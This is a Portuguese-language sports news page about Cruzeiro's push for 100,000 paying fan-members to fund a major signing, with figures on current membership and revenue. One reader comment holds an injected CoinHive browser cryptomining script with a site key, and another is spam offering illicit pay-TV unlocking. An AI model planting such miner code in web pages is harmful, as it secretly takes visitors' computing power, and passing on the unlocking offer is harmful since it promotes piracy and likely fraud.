logo

19/1/2018 07:18

Uma semana após lançar desafio, Cruzeiro lidera adesões de novos sócios no ano

Raposa se aproxima de 70 mil associados e segue caminhando rumo à meta para possível "grande contratação" na janela de transferências do meio de 2018

Uma semana após lançar desafio, Cruzeiro lidera adesões de novos sócios no ano

- Se o torcedor corresponder, e a gente tiver mais de 100 mil sócios pagando, nós vamos fazer uma contratação (na janela de transferências do meio do ano)



Itair Machado, vice-presidente do Cruzeiro, convocou, e uma semana depois da fala do dirigente, o clube alcançou o topo do ranking de sócio-torcedor de 2018. Ao todo, 3.754 cruzeirenses aderiram ao programa desde o início do ano. A empolgação da torcida pôde ser notada na vitória diante do Tupi, por 2 a 0, na quarta-feira, quando 42.297 torcedores estiveram presentes no Mineirão, na estreia do time nesta temporada.



Agora, o Cruzeiro está próximo de chegar à marca de 70 mil sócios-torcedores (atualmente conta com 67.983). Na frente do clube mineiro estão Flamengo, Atlético-MG, Internacional, São Paulo, Palmeiras, Corinthians e Grêmio.



Itair Machado considera o número pequeno para o tamanho da torcida celeste. Tanto é que ele lançou o desafio: se o clube conseguir 100 mil sócios até o meio do ano, a diretoria fará uma das maiores contratação da história do Cruzeiro.

- Eu tenho vontade de trazer um jogador para o Cruzeiro, que, se esse jogador viesse, ia ser um dos maiores reforços da história do Cruzeiro. Para trazermos esse jogador, precisamos de uns 25 milhões de reais, só para iniciar. Precisamos que o torcedor faça o sócio. Um clube que tem nove milhões de torcedores, não pode ter a quantidade de sócios que nós temos. Vamos nos organizar dentro de campo, o time está equilibrado, mas nós precisamos do torcedor.

Atualmente, o Cruzeiro arrecada, aproximadamente, R$ 30 milhões por ano com o sócio-torcedor. Dos 67.983 associados, cerca de 10 mil são cativos (modalidades Tríplice Coroa, Libertadores, Brasileiro e Copa do Brasil), ou seja, que têm entrada garantida em todos os jogos do time, quando mandante. O restante, além de pagar mensalidade por mês, precisam comprar o ingresso, mas com benefícios (modalidades Cruzeiro Sempre, Time do Povo e Papafilas).

10047 visitas - Fonte: Globo Esporte


Rafael Pontes     

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Wilson Leal     

Itai laçar o sócio craque para pessoas que moram entrou estado ou em países que ajuda o time e também para torcedores no interior não tem como ir no mineração mais que ajuda o cruzeiro.

tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Campeonato Mineiro

S&# - 16:30 - Mineirão - PPV
Cruzeiro
Boa Esporte

Último jogo - Campeonato Mineiro

S&# - 16:30 - Mineião
Cruzeiro
1 0
Vila Nova

Classificação